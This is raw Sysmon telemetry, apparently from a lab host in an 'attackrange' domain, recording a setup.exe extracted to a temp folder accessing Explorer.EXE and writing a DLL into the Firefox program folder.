13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\d3dcompiler_47.dll2021-01-18 13:59:52.271 10341000x800000000000000014687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
